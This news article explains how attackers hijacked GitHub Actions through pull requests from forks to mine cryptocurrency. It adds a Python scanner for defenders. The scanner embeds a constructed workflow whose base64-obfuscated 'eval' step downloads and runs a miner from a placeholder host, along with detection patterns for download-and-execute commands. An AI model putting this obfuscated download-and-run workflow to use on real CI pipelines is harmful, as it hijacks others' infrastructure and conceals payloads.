GitHub Actions abused to mine cryptocurrency on GitHub's own infrastructure

GitHub is investigating a series of attacks in which intruders managed to set up cryptocurrency mining inside GitHub's cloud infrastructure, using GitHub Actions to run their code. The first attempts to use GitHub Actions for mining were observed last year.

GitHub Actions lets handlers (workflows) be attached to a repository to automate various operations in GitHub. For example, a workflow can run checks and tests on every commit, or automate the processing of new issues. To start mining, the attacker forks a repository that already uses GitHub Actions, adds a new workflow to the fork, and sends a pull request to the original repository proposing to replace the existing workflow handlers with the new one, ".github/workflows/ci.yml".

The malicious pull request triggers repeated runs of the GitHub Actions handler: each run is killed by the 72-hour timeout (the maximum duration of a workflow run), fails, and is then started again. All the attacker needs to do is open the pull request; the handler starts automatically, without any confirmation from or participation of the maintainers of the original repository, who can only notice the suspicious activity after the fact and cancel the GitHub Actions jobs that are already running.

In the attacker's ci.yml handler, the "run" parameter contains obfuscated code (see https://twitter.com/justinperperdok/status/1377970934955573251) of the form `eval "$(echo 'YXB0IHVwZGF0ZSAt...' | base64 -d)"` (the visible prefix of the base64 blob decodes to `apt update -`), which attempts to download and execute a mining program. In the first variants of the attack, a program named npm.exe was fetched from various repositories on GitHub and GitLab; despite the name, it was an ELF executable built for Alpine Linux (the distribution commonly used in Docker images).

In newer variants of the attack, the source code of the XMRig miner is downloaded from the project's official repository and then built on the runner with the attacker's wallet address and the pool servers to which results are sent compiled in.
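The pattern described in the two paragraphs above (a `run:` step that base64-decodes a blob and feeds it to `eval`, and a payload that fetches npm.exe or builds XMRig) is easy to triage statically before a pull request's workflow is ever allowed to run. The script below is an added example, not code from the article, from GitHub, or from the attackers; it uses only the Python standard library. The sample workflow, its base64 blob, and the host name pool.example.invalid are constructed for the example and are not the real attacker artifacts.

```python
"""Static triage of a pull-request workflow file for the miner pattern described above:
a `run:` step that base64-decodes a blob and feeds it to `eval` to fetch and start a miner.
Added example (not the article's or GitHub's code); standard library only."""
import base64
import re

# Constructed sample workflow (NOT the attacker's real ci.yml). The blob is built here from
# a placeholder command so the example runs offline; the host name is an assumption.
_PAYLOAD = ("apt update -y && curl -s http://pool.example.invalid/npm.exe -o /tmp/npm.exe "
            "&& chmod +x /tmp/npm.exe && /tmp/npm.exe --url stratum+tcp://pool.example.invalid:3333")
_BLOB = base64.b64encode(_PAYLOAD.encode()).decode()

MALICIOUS_CI_YML = f"""name: CI
on: [pull_request]
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v2
      - name: test
        run: |
          echo "running tests"
          eval "$(echo '{_BLOB}' | base64 -d)"
"""

BENIGN_CI_YML = """name: CI
on: [pull_request]
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v2
      - run: npm ci
      - run: npm test
"""

RUN_LINE = re.compile(r"^(\s*)(?:-\s*)?run:\s*(.*)$")
# Shell idioms that deserve a second look in a workflow arriving from a fork.
SUSPICIOUS = {
    "base64-decode": re.compile(r"base64\s+(-d|--decode)\b"),
    "eval": re.compile(r"\beval\b"),
    "download-and-run": re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b"),
    "chmod-exec": re.compile(r"chmod\s+\+x"),
    "miner-indicator": re.compile(r"xmrig|stratum\+tcp|--donate-level|npm\.exe", re.I),
}
B64_LITERAL = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")


def extract_run_commands(workflow_text):
    """Return the shell text of every `run:` step (single-line value or `|`/`>` block scalar)."""
    lines = workflow_text.splitlines()
    commands = []
    i = 0
    while i < len(lines):
        m = RUN_LINE.match(lines[i])
        i += 1
        if not m:
            continue
        value = m.group(2).strip()
        if value in ("|", ">", "|-", ">-", "|+", ">+"):
            # Block scalar: take following lines indented deeper than the `run:` key.
            base = len(m.group(1))
            block = []
            while i < len(lines) and (not lines[i].strip()
                                      or len(lines[i]) - len(lines[i].lstrip()) > base):
                block.append(lines[i].strip())
                i += 1
            commands.append("\n".join(block).strip())
        else:
            commands.append(value.strip("\"'"))
    return commands


def decode_base64_literals(command):
    """Decode every long base64-looking token in a command; keep the ones that are text."""
    decoded = []
    for tok in B64_LITERAL.findall(command):
        try:
            text = base64.b64decode(tok, validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            continue
        if all(c.isprintable() or c in "\n\t" for c in text):
            decoded.append(text)
    return decoded


def scan_workflow(workflow_text):
    """One entry per `run:` step: the command, its decoded base64 layers, and the rules that
    fired (rules hit inside a decoded layer are prefixed `decoded:`), so the obfuscation
    layer does not hide the download-and-execute logic from the reviewer."""
    report = []
    for cmd in extract_run_commands(workflow_text):
        layers = [cmd] + decode_base64_literals(cmd)
        hits = []
        for depth, text in enumerate(layers):
            for rule, pat in SUSPICIOUS.items():
                m = pat.search(text)
                if m:
                    hits.append((rule if depth == 0 else "decoded:" + rule, m.group(0)))
        report.append({"run": cmd, "decoded": layers[1:], "findings": hits})
    return report


def is_suspicious(workflow_text):
    """True if any `run:` step in the workflow triggers at least one rule."""
    return any(step["findings"] for step in scan_workflow(workflow_text))


if __name__ == "__main__":
    for name, text in (("benign", BENIGN_CI_YML), ("malicious", MALICIOUS_CI_YML)):
        for step in scan_workflow(text):
            print(name, "->", step["findings"] or "clean")
```

Run this against the `.github/workflows/` files touched by a pull request before approving its workflow runs; the decoded layer is what a reviewer needs to see, since the `eval "$(... | base64 -d)"` wrapper alone tells them nothing about what the step does. It is a heuristic (an attacker can split strings or use a different encoding), so it complements rather than replaces the repository-level control GitHub introduced after these attacks, requiring maintainer approval before workflows run for pull requests from first-time contributors.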
